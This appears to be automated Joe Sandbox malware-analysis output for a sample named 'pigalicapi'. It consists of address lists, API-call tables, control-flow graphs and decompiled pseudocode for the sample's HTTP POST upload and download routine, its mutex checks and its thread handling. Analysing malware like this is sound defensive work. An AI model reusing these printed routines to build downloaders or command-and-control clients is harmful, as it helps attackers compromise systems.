                                                                                                                                                                                                                                                                                                        0x024e1ad7
                                                                                                                                                                                                                                                                                                        0x024e1adc
                                                                                                                                                                                                                                                                                                        0x024e1adf
                                                                                                                                                                                                                                                                                                        0x024e1b0f
                                                                                                                                                                                                                                                                                                        0x024e1b18
                                                                                                                                                                                                                                                                                                        0x024e1b1d
                                                                                                                                                                                                                                                                                                        0x024e1b20
                                                                                                                                                                                                                                                                                                        0x024e1b2d
                                                                                                                                                                                                                                                                                                        0x024e1b41
                                                                                                                                                                                                                                                                                                        0x024e1b41
                                                                                                                                                                                                                                                                                                        0x024e1b2d
                                                                                                                                                                                                                                                                                                        0x024e1b57
                                                                                                                                                                                                                                                                                                        0x024e1b5d
                                                                                                                                                                                                                                                                                                        0x024e1b6a
                                                                                                                                                                                                                                                                                                        0x024e1c19
                                                                                                                                                                                                                                                                                                        0x024e1c23
                                                                                                                                                                                                                                                                                                        0x024e1c3d
                                                                                                                                                                                                                                                                                                        0x024e1c43
                                                                                                                                                                                                                                                                                                        0x024e1b70
                                                                                                                                                                                                                                                                                                        0x024e1b79
                                                                                                                                                                                                                                                                                                        0x024e1b84
                                                                                                                                                                                                                                                                                                        0x024e1b86
                                                                                                                                                                                                                                                                                                        0x024e1b93
                                                                                                                                                                                                                                                                                                        0x024e1b99
                                                                                                                                                                                                                                                                                                        0x024e1b99
                                                                                                                                                                                                                                                                                                        0x024e1bbf
                                                                                                                                                                                                                                                                                                        0x024e1bc9
                                                                                                                                                                                                                                                                                                        0x024e1bd9
                                                                                                                                                                                                                                                                                                        0x024e1bd9
                                                                                                                                                                                                                                                                                                        0x024e1be2
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e1bf2
                                                                                                                                                                                                                                                                                                        0x024e1c04
                                                                                                                                                                                                                                                                                                        0x024e1c11
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e1c15
                                                                                                                                                                                                                                                                                                        0x024e1c17
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e1c17
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e1be4
                                                                                                                                                                                                                                                                                                        0x024e1c4c
                                                                                                                                                                                                                                                                                                        0x024e1c55
                                                                                                                                                                                                                                                                                                        0x024e1c5b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e1a30

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 024E1902
                                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 024E191D
                                                                                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 024E1956
                                                                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,024EC2C8,00200300,00000000), ref: 024E1994
                                                                                                                                                                                                                                                                                                        • wnsprintfA.SHLWAPI ref: 024E19C2
                                                                                                                                                                                                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 024E19DD
                                                                                                                                                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 024E1A16
                                                                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 024E1A6D
                                                                                                                                                                                                                                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 024E1A99
                                                                                                                                                                                                                                                                                                        • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 024E1B07
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 024E1B57
                                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 024E1BBF
                                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024E1C3D
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 024E1C75
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 024E1C82
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 024E1C8F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • <, xrefs: 024E18BD
                                                                                                                                                                                                                                                                                                        • Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 024E19B1
                                                                                                                                                                                                                                                                                                        • POST, xrefs: 024E1988
                                                                                                                                                                                                                                                                                                        • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 024E1918
                                                                                                                                                                                                                                                                                                        • 0u, xrefs: 024E19EB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: 0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                                                                        • API String ID: 880997049-2804282621
                                                                                                                                                                                                                                                                                                        • Opcode ID: cd1c800169a05797ca0cc9c039310551fa1adbdefeefec0031a479c3dc5cc6cc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 913e27883fbe3142f4188c9579e2fc372b868491048d8a463b96e962c2211e70
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd1c800169a05797ca0cc9c039310551fa1adbdefeefec0031a479c3dc5cc6cc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08C10BB1D842189FEF24CF50CC89BEAB7B5EB44705F0045DAE50EA6280DB766E94CF54
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 636 414330-41441b strlen call 40db20 memcpy CreateMutexA WaitForSingleObject 639 41441d 636->639 640 41441e-41442d FindAtomA 636->640 639->640 641 414433-41444c malloc 640->641 642 4144b7-4144cc call 4142c0 640->642 644 414450-414453 641->644 648 414492-4144b3 ReleaseMutex CloseHandle 642->648 646 414455 644->646 647 414458-41445e 644->647 646->647 647->644 649 414460-41446f AddAtomA 647->649 650 414471-414488 call 4142c0 649->650 651 4144b4-4144b5 649->651 654 41448a-41448d free 650->654 655 4144ce-4144ea memset 650->655 651->650 654->648 655->648 656 4144ec-4144f2 655->656 656->648
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • strlen.NTDLL ref: 0041433F
                                                                                                                                                                                                                                                                                                        • memcpy.NTDLL ref: 0041438D
                                                                                                                                                                                                                                                                                                        • CreateMutexA.KERNEL32 ref: 004143F5
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
                                                                                                                                                                                                                                                                                                        • FindAtomA.KERNEL32 ref: 00414421
                                                                                                                                                                                                                                                                                                        • malloc.MSVCRT ref: 00414439
                                                                                                                                                                                                                                                                                                        • AddAtomA.KERNEL32 ref: 00414463
                                                                                                                                                                                                                                                                                                        • free.MSVCRT ref: 0041448D
                                                                                                                                                                                                                                                                                                        • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 004144A1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004142C0: GetAtomNameA.KERNEL32(?,?,00000000), ref: 004142E3
                                                                                                                                                                                                                                                                                                        • memset.NTDLL ref: 004144E0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Atom$Mutex$CloseCreateFindHandleNameObjectReleaseSingleWaitfreemallocmemcpymemsetstrlen
                                                                                                                                                                                                                                                                                                        • String ID: aaaa$aaaa$aaaa$aaaa$aaaa$aaaa$aaaa
                                                                                                                                                                                                                                                                                                        • API String ID: 144078300-3683700703
                                                                                                                                                                                                                                                                                                        • Opcode ID: 38b3cc8253dde639ec07bf90a86a76e51e9cf28e81e2267e67a4dab4306abd3d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6bf16c6f7dc82afa38dfb2dcebf575d49d4c190a343fd4b51b9df02f2ee255c1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38b3cc8253dde639ec07bf90a86a76e51e9cf28e81e2267e67a4dab4306abd3d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 635129B89083458BC710EF69D4863AEBBF0BF84301F01896EE8959B385D778D585CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 658 40ec50-40ed35 strlen call 40db20 memcpy CreateMutexA WaitForSingleObject 661 40ed37 658->661 662 40ed38-40ed47 FindAtomA 658->662 661->662 663 40edd3-40ede8 call 40ebe0 662->663 664 40ed4d-40ed60 malloc 662->664 670 40eda7-40edcb ReleaseMutex FindCloseChangeNotification 663->670 666 40ed65-40ed68 664->666 668 40ed6a 666->668 669 40ed6d-40ed73 666->669 668->669 669->666 671 40ed75-40ed84 AddAtomA 669->671 672 40edd0-40edd1 671->672 673 40ed86-40ed9d call 40ebe0 671->673 672->673 676 40edea-40ee06 memset 673->676 677 40ed9f-40eda2 free 673->677 676->670 678 40ee08-40ee10 676->678 677->670 678->670
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AtomFindMutex$ChangeCloseCreateNotificationObjectReleaseSingleWaitfreemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID: aaaa$aaaa$aaaa$aaaa$aaaa$aaaa$aaaa
                                                                                                                                                                                                                                                                                                        • API String ID: 3507070773-3683700703
                                                                                                                                                                                                                                                                                                        • Opcode ID: d61ac55fb7e6056a8369cbc7b453f13adbe996a2e49b94902fd9d61e9f0cc443
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8522d72e3f7aa3cec7441999860715555553f08e688ef583daf8eacf07a88261
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d61ac55fb7e6056a8369cbc7b453f13adbe996a2e49b94902fd9d61e9f0cc443
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91517BB85083428FC710AF2AC48A26EBBF0FF84301F01896EE8859B391D778D555CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                                                                                                                                                        			E024E4020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                                                                                                                                                                                                                                                        				signed int _v5;
                                                                                                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				struct _CRITICAL_SECTION _v44;
                                                                                                                                                                                                                                                                                                        				long _v48;
                                                                                                                                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                                                                                                                                        				void _v56;
                                                                                                                                                                                                                                                                                                        				long _v60;
                                                                                                                                                                                                                                                                                                        				HANDLE* _v64;
                                                                                                                                                                                                                                                                                                        				void* _v68;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                                                                                                                                                                        				void* _v76;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                                                                                                                                                        				void _v92;
                                                                                                                                                                                                                                                                                                        				long _v96;
                                                                                                                                                                                                                                                                                                        				signed int _v100;
                                                                                                                                                                                                                                                                                                        				HANDLE* _v104;
                                                                                                                                                                                                                                                                                                        				HANDLE* _v108;
                                                                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                                                                        				void* _t141;
                                                                                                                                                                                                                                                                                                        				void* _t188;
                                                                                                                                                                                                                                                                                                        				void* _t189;
                                                                                                                                                                                                                                                                                                        				void* _t191;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
                                                                                                                                                                                                                                                                                                        					E024E7D20( &_v56,  &_v56, 0, 0x29);
                                                                                                                                                                                                                                                                                                        					_t189 = _t188 + 0xc;
                                                                                                                                                                                                                                                                                                        					InitializeCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        					_v16 = _a24;
                                                                                                                                                                                                                                                                                                        					_v20 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                                                                                                                                                        					_v12 = _a8 / _a20;
                                                                                                                                                                                                                                                                                                        					_v60 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v60 < _a16) {
                                                                                                                                                                                                                                                                                                        						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        						if(_v52 != 0) {
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        							_v52 = 0;
                                                                                                                                                                                                                                                                                                        							_v48 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t198 = _v56;
                                                                                                                                                                                                                                                                                                        						if(_v56 != 0) {
                                                                                                                                                                                                                                                                                                        							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                                                        							_v56 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						ResetEvent(_v20);
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        						_t114 = CreateThread(0, 0, E024E4AC0,  &_v56, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        						_v56 = _t114;
                                                                                                                                                                                                                                                                                                        						_v104 = E024E97A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
                                                                                                                                                                                                                                                                                                        						_v64 = _v104;
                                                                                                                                                                                                                                                                                                        						E024E7D20(_v104, _v64, 0, _a20 << 2);
                                                                                                                                                                                                                                                                                                        						_t191 = _t189 + 0x10;
                                                                                                                                                                                                                                                                                                        						_v100 = 0;
                                                                                                                                                                                                                                                                                                        						while(_v100 < _a20) {
                                                                                                                                                                                                                                                                                                        							_v64[_v100] = 0;
                                                                                                                                                                                                                                                                                                        							E024E7D20(_v64,  &_v92, 0, 0x1c);
                                                                                                                                                                                                                                                                                                        							_t191 = _t191 + 0xc;
                                                                                                                                                                                                                                                                                                        							_v68 =  &_v56;
                                                                                                                                                                                                                                                                                                        							_v72 = _a12;
                                                                                                                                                                                                                                                                                                        							_v92 = _a4;
                                                                                                                                                                                                                                                                                                        							_v84 = _v100 * _v12;
                                                                                                                                                                                                                                                                                                        							if(_v100 >= _a20 - 1) {
                                                                                                                                                                                                                                                                                                        								_v80 = _a8 - 1;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v80 = _v84 + _v12 - 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v76 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                                        							_t141 = CreateThread(0, 0, E024E4BA0,  &_v92, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        							_v64[_v100] = _t141;
                                                                                                                                                                                                                                                                                                        							WaitForSingleObject(_v76, 0xffffffff);
                                                                                                                                                                                                                                                                                                        							FindCloseChangeNotification(_v76); // executed
                                                                                                                                                                                                                                                                                                        							_v100 = _v100 + 1;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
                                                                                                                                                                                                                                                                                                        						_v96 = WaitForSingleObject(_v20, 0x2710);
                                                                                                                                                                                                                                                                                                        						if(_v96 == 0) {
                                                                                                                                                                                                                                                                                                        							_v5 = 1;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v96 = WaitForSingleObject(_v56, 0x3e8);
                                                                                                                                                                                                                                                                                                        						if(_v96 != 0) {
                                                                                                                                                                                                                                                                                                        							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        						if(_v52 != 0) {
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v52, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        							_v52 = 0;
                                                                                                                                                                                                                                                                                                        							_v48 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        						_v108 = _v64;
                                                                                                                                                                                                                                                                                                        						E024E97C0(_v108);
                                                                                                                                                                                                                                                                                                        						_t189 = _t191 + 4;
                                                                                                                                                                                                                                                                                                        						if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        							_v60 = _v60 + 1;
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					DeleteCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                                                                                                                                        			}




























                                                                                                                                                                                                                                                                                                        0x024e4026
                                                                                                                                                                                                                                                                                                        0x024e402e
                                                                                                                                                                                                                                                                                                        0x024e405a
                                                                                                                                                                                                                                                                                                        0x024e405f
                                                                                                                                                                                                                                                                                                        0x024e4066
                                                                                                                                                                                                                                                                                                        0x024e406f
                                                                                                                                                                                                                                                                                                        0x024e4080
                                                                                                                                                                                                                                                                                                        0x024e4086
                                                                                                                                                                                                                                                                                                        0x024e408a
                                                                                                                                                                                                                                                                                                        0x024e408d
                                                                                                                                                                                                                                                                                                        0x024e409f
                                                                                                                                                                                                                                                                                                        0x024e40af
                                                                                                                                                                                                                                                                                                        0x024e40b9
                                                                                                                                                                                                                                                                                                        0x024e40c6
                                                                                                                                                                                                                                                                                                        0x024e40cc
                                                                                                                                                                                                                                                                                                        0x024e40d3
                                                                                                                                                                                                                                                                                                        0x024e40d3
                                                                                                                                                                                                                                                                                                        0x024e40da
                                                                                                                                                                                                                                                                                                        0x024e40de
                                                                                                                                                                                                                                                                                                        0x024e40e6
                                                                                                                                                                                                                                                                                                        0x024e40ec
                                                                                                                                                                                                                                                                                                        0x024e40ec
                                                                                                                                                                                                                                                                                                        0x024e40f7
                                                                                                                                                                                                                                                                                                        0x024e4101
                                                                                                                                                                                                                                                                                                        0x024e4118
                                                                                                                                                                                                                                                                                                        0x024e411e
                                                                                                                                                                                                                                                                                                        0x024e413d
                                                                                                                                                                                                                                                                                                        0x024e4143
                                                                                                                                                                                                                                                                                                        0x024e4153
                                                                                                                                                                                                                                                                                                        0x024e4158
                                                                                                                                                                                                                                                                                                        0x024e415b
                                                                                                                                                                                                                                                                                                        0x024e416d
                                                                                                                                                                                                                                                                                                        0x024e417f
                                                                                                                                                                                                                                                                                                        0x024e418e
                                                                                                                                                                                                                                                                                                        0x024e4193
                                                                                                                                                                                                                                                                                                        0x024e4199
                                                                                                                                                                                                                                                                                                        0x024e419f
                                                                                                                                                                                                                                                                                                        0x024e41a5
                                                                                                                                                                                                                                                                                                        0x024e41af
                                                                                                                                                                                                                                                                                                        0x024e41bb
                                                                                                                                                                                                                                                                                                        0x024e41d2
                                                                                                                                                                                                                                                                                                        0x024e41bd
                                                                                                                                                                                                                                                                                                        0x024e41c7
                                                                                                                                                                                                                                                                                                        0x024e41c7
                                                                                                                                                                                                                                                                                                        0x024e41e3
                                                                                                                                                                                                                                                                                                        0x024e41f7
                                                                                                                                                                                                                                                                                                        0x024e4203
                                                                                                                                                                                                                                                                                                        0x024e420c
                                                                                                                                                                                                                                                                                                        0x024e4216
                                                                                                                                                                                                                                                                                                        0x024e416a
                                                                                                                                                                                                                                                                                                        0x024e416a
                                                                                                                                                                                                                                                                                                        0x024e422d
                                                                                                                                                                                                                                                                                                        0x024e4242
                                                                                                                                                                                                                                                                                                        0x024e4249
                                                                                                                                                                                                                                                                                                        0x024e424b
                                                                                                                                                                                                                                                                                                        0x024e424b
                                                                                                                                                                                                                                                                                                        0x024e425e
                                                                                                                                                                                                                                                                                                        0x024e4265
                                                                                                                                                                                                                                                                                                        0x024e426d
                                                                                                                                                                                                                                                                                                        0x024e426d
                                                                                                                                                                                                                                                                                                        0x024e4277
                                                                                                                                                                                                                                                                                                        0x024e4281
                                                                                                                                                                                                                                                                                                        0x024e428e
                                                                                                                                                                                                                                                                                                        0x024e4294
                                                                                                                                                                                                                                                                                                        0x024e429b
                                                                                                                                                                                                                                                                                                        0x024e429b
                                                                                                                                                                                                                                                                                                        0x024e42a6
                                                                                                                                                                                                                                                                                                        0x024e42af
                                                                                                                                                                                                                                                                                                        0x024e42b6
                                                                                                                                                                                                                                                                                                        0x024e42bb
                                                                                                                                                                                                                                                                                                        0x024e42c4
                                                                                                                                                                                                                                                                                                        0x024e409c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e42c6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e42c4
                                                                                                                                                                                                                                                                                                        0x024e42d1
                                                                                                                                                                                                                                                                                                        0x024e42d1
                                                                                                                                                                                                                                                                                                        0x024e42dd

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(?), ref: 024E4066
                                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 024E407A
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?), ref: 024E40AF
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E40C6
                                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 024E40E6
                                                                                                                                                                                                                                                                                                        • ResetEvent.KERNEL32(00000000), ref: 024E40F7
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 024E4101
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 024E4118
                                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 024E41DD
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 024E41F7
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 024E420C
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 024E4216
                                                                                                                                                                                                                                                                                                        • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 024E422D
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 024E423C
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 024E4258
                                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 024E426D
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 024E4277
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E428E
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 024E42A6
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?), ref: 024E42D1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
